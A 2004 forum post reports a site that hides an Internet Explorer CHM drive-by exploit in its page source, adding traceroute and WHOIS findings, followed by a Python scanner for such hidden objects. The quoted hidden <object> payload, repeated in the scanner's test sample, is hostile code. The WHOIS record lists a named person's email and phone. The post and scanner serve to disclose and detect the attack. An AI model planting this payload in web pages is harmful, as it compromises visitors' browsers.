The site, refestltd.com (DO NOT GO THERE IF YOU'RE RUNNING IE), has an ad for SpyHunter along with an affiliate link on the front page.
This bumps SpyHunter up into the ranks of CWS in my view. It remains to be seen whether SpyHunter will take action against this affiliate, but personally, I hope the people behind this are dragged out into the street and beaten with SCSI cables.
And yes, I know the image quality is bad. I had to copy/paste into _Paint_ because I'm on my work laptop and I don't have anything better on it.
<edit>
I opened up the source, and what do you know, look what was in it! (DON'T CLICK THE LINKS!)
<!-- TRTRTRTRTR -->
<div style.none>
<object type='text/x-scriptlet' data='ms-its:mhtml:file://c:\sdfs.mht!http://www.refestltd...l.chm::/idx.htm' style='visibility:hidden'>
</object>
</div>
<!-- TRTRTRTRTR -->
The little rats are trying to exploit the .chm vulnerability in IE! This is plain out-and-out criminal!
I'm doing a tracert as we speak. Methinks this is going to end up in Russia.
</edit>
<later edit>
According to two different tracert logs, this site's hosted in San Diego by AplusNet. I would suggest that someone mirror the site's contents before the authorities yank it - I'm going to get what I can and investigate these rats.
Here's the tracert log, as performed from a server in the Netherlands:
1 ofc.br05.m3x.support.nl (195.114.228.89) [AS8582] 1 ms 1 ms 1 ms
2 ar09.m3x.support.nl (195.114.231.55) [AS8582] 1 ms 1 ms 1 ms
3 br07.m3x.support.nl (195.114.231.47) [AS8582] 1 ms 1 ms 1 ms
4 lvl3gw.ams1.packetexchange.net (213.19.161.1) [AS9057/AS3356] 2 ms 3 ms 2 ms
5 ae-0-55.mp1.Amsterdam1.Level3.net (213.244.165.97) [AS9057/AS3356] 3 ms 10 ms 8 ms
6 so-3-0-0.mp1.London2.Level3.net (212.187.128.46) [AS9057/AS3356] 11 ms 11 ms 12 ms
7 as-0-0.bbr2.Washington1.Level3.net (4.68.128.102) [AS3356] 83 ms 85 ms 85 ms
8 so-0-1-0.mp1.SanDiego1.Level3.net (64.159.1.137) [AS3356] 144 ms 146 ms 144 ms
9 so-8-0.hsa1.SanDiego1.Level3.net (4.68.112.130) [AS3356] 144 ms 144 ms 147 ms
10 Aplus-gw.Level3.net (209.245.56.130) [AS3356] 145 ms 145 ms 144 ms
11 core01.san-diego.abac.net (216.55.131.2) [AS10316] 256 ms 146 ms 144 ms
12 pro10.abac.com (66.226.64.11) [AS10316] 145 ms 144 ms 145 ms
The host's IP address is genuine; it appears to be 66.226.64.11.
The WHOIS information is obviously falsified.
Domain name: refestltd.com
Registrant:
Jay Seaton (6PPPG) jay@tremjade.com
NA
NA, NA 00000
United States
Phone: (913)6814254 x
Administrative Contact:
Jay Seaton (F6DUK) jay@tremjade.com
NA
NA, NA 00000
United States
Phone: (913)6814254 x
Technical Contact:
Jay Seaton (6PPPG) jay@tremjade.com
NA
NA, NA 00000
United States
Phone: (913)6814254 x
Billing Contact:
Jay Seaton (7JN5G) jay@tremjade.com
NA
NA, NA 00000
United States
Phone: (913)6814254 x
Record last updated on 2004-04-22 00:00:00
Record created on 2004-04-22 00:00:00
Record expires on 2005-04-22 00:00:00
Domain servers in listed order:
ns1.abac.com 216.55.128.4
ns2.abac.com
Registration Service Provider: AplusNet(APRO)
apro-n4e-racc@abac.com
http://www.aplus.net
Registrar: NAMES4EVER, http://www.names4ever.com
The previous information has been obtained either directly from the registrant or a registrar of the domain name other than Network Solutions. Network Solutions, therefore, does not guarantee its accuracy or completeness.
That's what I've got for now. Further bulletins as events warrant.
</later edit>
Edited by Tuxedo Jack, 29 June 2004 - 03:23 PM.
Signature file is under revision. This will be back shortly.
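The hidden `<object>` quoted in the post is the kind of thing a defender wants to catch automatically when reviewing page source or proxy captures. The following is an added example, not code from the post or from the site being discussed: a small Python scanner that flags `<object>` tags combining a `text/x-scriptlet` type, an `ms-its:`/`mhtml:` data URL pointing at a `.chm` file, and a hidden style. The sample HTML below is constructed to mirror the quoted snippet, with the real domain replaced by the placeholder `www.example.invalid` (an assumption, since the post only shows a truncated URL).

```python
"""Flag hidden <object> tags that load CHM content via ms-its:/mhtml: URLs.

Added example (not the forum poster's code). It checks for the combination
quoted in the post: a hidden 'text/x-scriptlet' object whose data attribute
chains the ms-its: and mhtml: protocol handlers to reach a .chm file.
"""
from html.parser import HTMLParser
from typing import Dict, List

# Protocol handlers that were abused to pull CHM files into IE's HTML Help
# engine; matching is done against the start of the object's data attribute.
SUSPICIOUS_SCHEMES = ("ms-its:", "mhtml:", "its:", "mk:@msitstore:")
SUSPICIOUS_TYPES = ("text/x-scriptlet",)


class ObjectScanner(HTMLParser):
    """Collects every <object> tag that shows one or more warning signs."""

    def __init__(self) -> None:
        super().__init__()
        self.findings: List[Dict] = []

    def handle_starttag(self, tag: str, attrs) -> None:
        if tag != "object":
            return
        # HTMLParser lower-cases attribute names; values are kept as written.
        a = {name: (value or "") for name, value in attrs}
        data = a.get("data", "").strip().lower()
        otype = a.get("type", "").strip().lower()
        style = a.get("style", "").replace(" ", "").lower()

        reasons = []
        if data.startswith(SUSPICIOUS_SCHEMES):
            reasons.append("data uses ms-its/mhtml scheme")
        if ".chm" in data:
            reasons.append("data references a .chm file")
        if otype in SUSPICIOUS_TYPES:
            reasons.append("type is text/x-scriptlet")
        if "visibility:hidden" in style or "display:none" in style:
            reasons.append("object is hidden")

        if reasons:
            self.findings.append(
                {"data": a.get("data", ""), "type": otype, "reasons": reasons}
            )


def scan_html(html: str) -> List[Dict]:
    """Return a list of suspicious <object> findings for the given markup."""
    parser = ObjectScanner()
    parser.feed(html)
    parser.close()
    return parser.findings


def is_suspicious(html: str) -> bool:
    """True when any <object> trips at least two independent warning signs."""
    return any(len(f["reasons"]) >= 2 for f in scan_html(html))


# Constructed sample modelled on the snippet quoted in the post; the domain
# is a placeholder, not the real site.
SAMPLE_MALICIOUS = r"""
<!-- TRTRTRTRTR -->
<div style.none>
<object type='text/x-scriptlet'
 data='ms-its:mhtml:file://c:\sdfs.mht!http://www.example.invalid/x.chm::/idx.htm'
 style='visibility:hidden'>
</object>
</div>
<!-- TRTRTRTRTR -->
"""

# Constructed benign page: an ordinary, visible embedded object.
SAMPLE_BENIGN = """
<object type="application/x-shockwave-flash" data="intro.swf" width="300"></object>
"""

if __name__ == "__main__":
    for label, html in (("malicious", SAMPLE_MALICIOUS), ("benign", SAMPLE_BENIGN)):
        for finding in scan_html(html):
            print(label, "->", "; ".join(finding["reasons"]))
        print(label, "suspicious:", is_suspicious(html))
```

Requiring two independent signs before raising an alert keeps a lone hidden object or a lone `.chm` reference from tripping the check; the quoted snippet trips all four.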